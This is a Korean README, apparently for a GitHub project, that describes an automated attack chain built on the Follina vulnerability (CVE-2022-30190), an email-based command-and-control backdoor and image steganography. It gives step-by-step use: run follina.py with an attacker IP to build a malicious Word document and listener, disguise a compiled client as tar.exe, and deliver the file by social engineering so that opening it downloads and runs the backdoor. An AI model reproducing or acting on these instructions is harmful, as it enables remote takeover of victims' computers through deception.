
CVE-2022-30190, 163 이메일 백도어 및 이미지 스테가노그래피를 기반으로 한 자동화된 공격 체인.
CVE-2022-30190, 163 이메일 백도어, 이미지 스테가노그래피를 기반으로 한 자동화된 공격 체인
다음 GitHub 리포지토리에 감사드리며, 당사는 코드의 일부를 참조·수정하여 통합 및 구현하였습니다:
中文README请看这里
gdog:
follina:
follina.py를 사용하여 악성 Word 파일을 생성하고 HTTP 리스닝을 켭니다.
--ip 및 --output을 사용하여 지정할 수도 있습니다.python follina.py --ip 100.100.100.100 --output maldoc.docgdog 아래의 client.py와 gdog.py를 수정하고 다음 정보를 입력합니다.
gmail_user = 'your email'
gmail_pwd = 'your pwd'
server = "smtp server"
imap_server = 'imap server'
client.py를 tar.exe로 컴파일하고 /follina/www 아래에 배치합니다.
어떤 사회공학적 방법을 사용해서든 대상에게 전송합니다. 피해자가 Word를 열기만 하면 tar.exe가 자동으로 다운로드되어 실행됩니다.
공격자는 로컬에서 gdog을 실행하고 명령을 전송하여 대상 시스템을 제어합니다. 사용법은 gdog을 참조하십시오.